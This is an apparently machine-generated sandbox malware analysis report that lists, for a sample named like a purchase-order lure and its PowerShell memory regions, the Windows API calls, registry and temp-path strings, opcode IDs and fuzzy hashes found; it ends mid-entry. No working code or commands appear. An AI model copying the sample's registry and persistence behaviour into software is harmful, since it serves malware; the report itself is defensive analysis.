                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                        • Instruction ID: 6f1bda49a4997cd21eb3df4025a59d3ac8dc5d95b16fa6faa4f7de2005ea5abe
                                                        • Opcode Fuzzy Hash: 483d17516720e2e8ab10c88a8952f1e8a1428c38e87ce861c3d636333663c13f
                                                        • Instruction Fuzzy Hash: 57219C7191421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenW.KERNEL32(distributed\Ristingets\,00000023,00000011,00000002), ref: 004024DA
                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 0040251A
                                                        • RegCloseKey.ADVAPI32(?,?,?,distributed\Ristingets\,00000000,00000011,00000002), ref: 00402602
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CloseValuelstrlen
                                                        • String ID: distributed\Ristingets\
                                                        • API String ID: 2655323295-4223474621
                                                        • Opcode ID: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                        • Instruction ID: be9c33e72f15a848a09509bfe82e7b73cbf05d8b6c9bfbfc98f7540490fedb8c
                                                        • Opcode Fuzzy Hash: 30c8621953cd876262fbd94b52e9500918e6bc3baaa165e74801803e0a09f0dc
                                                        • Instruction Fuzzy Hash: 26119D31900118AEEB10EFA5DE59EAEBAB4AB44318F10483FF404B61C0C7B88E019A58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F57
                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403632,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00405F61
                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405F73
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3081826266
                                                        • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                        • Instruction ID: a99b79add3f29df6de165ac7772d062030ca4d7d7db28986cd5f5f8a2b4e36b3
                                                        • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                        • Instruction Fuzzy Hash: C9D0A731101934AAC211AF548D04CDF639C9F463443414C3BF501B30A1CB7D6D6287FD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenA.KERNEL32(afsmitningernes), ref: 0040269A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: afsmitningernes$distributed\Ristingets\
                                                        • API String ID: 1659193697-3641217871
                                                        • Opcode ID: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                        • Instruction ID: 3f04c1712215209208acb7642429b7129ba4cba87377fac841ce35f74c6015ca
                                                        • Opcode Fuzzy Hash: 0bc0856152eb1df416620cc5b8216ee98a437742c409cafcdd725fde6fb42ba2
                                                        • Instruction Fuzzy Hash: DF110A72A40205BBCB00BBB19E4AA9F76A19F50748F21483FF502F61C1DAFD89D1665E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 004056AA
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004056FB
                                                          • Part of subcall function 0040464D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040465F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                        • Instruction ID: 56d6425d582badedfe6e85af8287ead15e3733fa9de593adb61ce7d3cc062d63
                                                        • Opcode Fuzzy Hash: 566dc257d6ecfccfd9b8870a3abbf6eef49955a94d49fdbfe0e36d929d226f84
                                                        • Instruction Fuzzy Hash: 1601B131101608ABDF205F41DE80AAF3A39EB84754F90483BF509761D0D77B8C929E6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,004067C1,80000002), ref: 00406596
                                                        • RegCloseKey.ADVAPI32(?), ref: 004065A1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID: : Completed
                                                        • API String ID: 3356406503-2954849223
                                                        • Opcode ID: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                        • Instruction ID: 225dfe442f4fc2e839130f584d2f70a73ee2f61c7405cac2e0d59c7fe544a8ff
                                                        • Opcode Fuzzy Hash: 45cc12acc3a9c215c07d598151d8e3fd579320fa7e8caec45c805d12e0fab9e6
                                                        • Instruction Fuzzy Hash: 39017172510209FEDF218F55DD05EDB3BE8EB54364F014035FD1592190E738D968DBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FA3
                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405FB3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-224404859
                                                        • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                        • Instruction ID: 76a3089014cba6cdede5e63107dce03d3cc6699033e3804c636830b34c248568
                                                        • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                        • Instruction Fuzzy Hash: D1D05EB2401921DAE3126B04DD00D9F63ACEF12300746482AE840E7161D77C5C8186AD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060FF
                                                        • CharNextA.USER32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406110
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                        • Instruction ID: 41d5ee4ea83cc4d308be6584820b02a87ee89e19241337121ce36a8d52a16fb8
                                                        • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                        • Instruction Fuzzy Hash: 9DF06235504418EFC702DBA9DD00D9EBFA8EF46350B2640B9E841FB211DA74DE11AB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$tLyk$tLyk$tLyk$tLyk$x.xk$x.xk$x.xk$-xk$-xk
                                                        • API String ID: 0-2867687932
                                                        • Opcode ID: 16589e2439701be3e6baf1006bc3e365998806511b67b78db37916a8bac4fee8
                                                        • Instruction ID: c984bdec0a8a7a26db2d854c7d5401aad05c3fd924221872826143f2ec315515
                                                        • Opcode Fuzzy Hash: 16589e2439701be3e6baf1006bc3e365998806511b67b78db37916a8bac4fee8
                                                        • Instruction Fuzzy Hash: F6F25FB4A00218DFDB74DB28C950B9EB7F2BB85304F1089A9D909AB751DB31ED85CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4350000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02166fbcabe36206240d80a36bedf55a7a7e12948b93697a8307bb9d8b1458a9
                                                        • Instruction ID: 58374936afe3e12ee7c383882cb6330a549e7e0a08664674372fa092676be087
                                                        • Opcode Fuzzy Hash: 02166fbcabe36206240d80a36bedf55a7a7e12948b93697a8307bb9d8b1458a9
                                                        • Instruction Fuzzy Hash: 3CB16E70E00209CFDF14DFA9D985B9EBBF2BF88304F149529D815A7264EB34A946CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_4350000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d77084fe762757e0802114ce366e69601fe3b976748e3bf140461dd36f8c74e
                                                        • Instruction ID: d27cbb04b740b0dff6b9cad98d62a879866d6a91efdd8688a5d9ec7e6e7d9ee7
                                                        • Opcode Fuzzy Hash: 9d77084fe762757e0802114ce366e69601fe3b976748e3bf140461dd36f8c74e
                                                        • Instruction Fuzzy Hash: 77B18170E00609DFDF10CFA9D891B9DBBF2AF88318F149529D814EB264EB74A845CF81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                        • API String ID: 0-1262107880
                                                        • Opcode ID: 8d95849bd966baf4cd726d2482d971a3dd80fa5faf505a20a324dd58ecb027dd
                                                        • Instruction ID: 61996a34375e76f2d03e29a84fafe18e5a33ab10720d697cd017a2308739e996
                                                        • Opcode Fuzzy Hash: 8d95849bd966baf4cd726d2482d971a3dd80fa5faf505a20a324dd58ecb027dd
                                                        • Instruction Fuzzy Hash: C532B431F00204DFDB64CB68C554AAABBE6AF84324F24846ED8059FB55DB33DD45CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.xk$-xk
                                                        • API String ID: 0-986851567
                                                        • Opcode ID: 623a36cb86bae36b2b67f3a98ad7f3b6dfa7dac94163862b769deea1205d4109
                                                        • Instruction ID: d36b03d82bdf57aa8e82d89ad3dc9f2edbae47c71090c34f9c462cbbe1ac56d1
                                                        • Opcode Fuzzy Hash: 623a36cb86bae36b2b67f3a98ad7f3b6dfa7dac94163862b769deea1205d4109
                                                        • Instruction Fuzzy Hash: 3332C1F0B002059FCB249B68C955BAEFBE2AFC5310F14D579E401AF3A5DB71D8458BA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$tLyk$tLyk$x.xk$x.xk$-xk$-xk
                                                        • API String ID: 0-203466004
                                                        • Opcode ID: c2ab7929deef488e22dff0b7d7369fc9c15afaa2e7313b5537e835a95d3962b1
                                                        • Instruction ID: 974176d9cfbad75f6a3866f614f0571eee7e620836775c0685c265d46f486252
                                                        • Opcode Fuzzy Hash: c2ab7929deef488e22dff0b7d7369fc9c15afaa2e7313b5537e835a95d3962b1
                                                        • Instruction Fuzzy Hash: 7FB261B4A002189FDB74DB58CD51B9EB7F2AB84304F10C9A9D80A6B751DB31ED85CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                        • API String ID: 0-3272787073
                                                        • Opcode ID: 668bc76057ff48a6671588cfec508c4d997f11666fbb2b372337ca7f083d6e53
                                                        • Instruction ID: 29c37f3cb2c1020bb81ce9c05677713852855b80040e99c0ed6cab75807f2f55
                                                        • Opcode Fuzzy Hash: 668bc76057ff48a6671588cfec508c4d997f11666fbb2b372337ca7f083d6e53
                                                        • Instruction Fuzzy Hash: 701257F1B043069FCB649B69C91066ABBE2AFC6210F14C5FAD614DF351DA32DC45CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$x.xk$-xk
                                                        • API String ID: 0-471100413
                                                        • Opcode ID: e4fd6707335ff4d24856964123c34e1dcec14439e58a8280190d22327b286844
                                                        • Instruction ID: f301a5c0e504687cc1cd83a0717055f0c91466b122c10a4d663f53766c6dad4f
                                                        • Opcode Fuzzy Hash: e4fd6707335ff4d24856964123c34e1dcec14439e58a8280190d22327b286844
                                                        • Instruction Fuzzy Hash: 8B728EB0A00219DFDB34DB58CD51B6EB7B2AF85300F1089A9D819AB754DB31ED85CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$tLyk$x.xk$-xk
                                                        • API String ID: 0-2287037694
                                                        • Opcode ID: d4cd92fa9e3ca6feddc2bfb24d625bf5bfcf36301cfad8a15fd8adace4e86c27
                                                        • Instruction ID: 4d0abdae596f9cca898611d42d04201102db74a181cd7b3913664b9ff5121a9d
                                                        • Opcode Fuzzy Hash: d4cd92fa9e3ca6feddc2bfb24d625bf5bfcf36301cfad8a15fd8adace4e86c27
                                                        • Instruction Fuzzy Hash: 517291B0A00214DFDB34DB58CD51B6EB7B2AF85300F50C9A9D91AAB750DB31AD85CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                        • API String ID: 0-1420252700
                                                        • Opcode ID: 9f17e37fb6523dd46a96e6fdfb38a2f692fe42a18167cf710430c53cbcbd16a1
                                                        • Instruction ID: 70b9f5302844ef51f245e0ddd6a743bf465a25412a20077c132f4bded1072f94
                                                        • Opcode Fuzzy Hash: 9f17e37fb6523dd46a96e6fdfb38a2f692fe42a18167cf710430c53cbcbd16a1
                                                        • Instruction Fuzzy Hash: F01239F1B042059FCB259A68D91076EBBE2AFC6310F14C9BAD905CB391EB32DC45C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                        • API String ID: 0-2049395529
                                                        • Opcode ID: d30d5282f921488dc64c3fec263705cf7306ddbd7220d97e929eb8b6ea1b5486
                                                        • Instruction ID: a3cfa1c6908f98db2192b34f4879240d22e2986ea076d8b2f5405359a6358194
                                                        • Opcode Fuzzy Hash: d30d5282f921488dc64c3fec263705cf7306ddbd7220d97e929eb8b6ea1b5486
                                                        • Instruction Fuzzy Hash: 1B110A32F042058EDB659669A8501BAF7D5EB85230F20887FC555CBE87DF32C849C397
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_7040000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'^q$x.xk$-xk
                                                        • API String ID: 0-895538716
                                                        • Opcode ID: 03b799d5ad9135acad29a165a83bde50a6bbb50ee0c6a98260385eb0c343a458
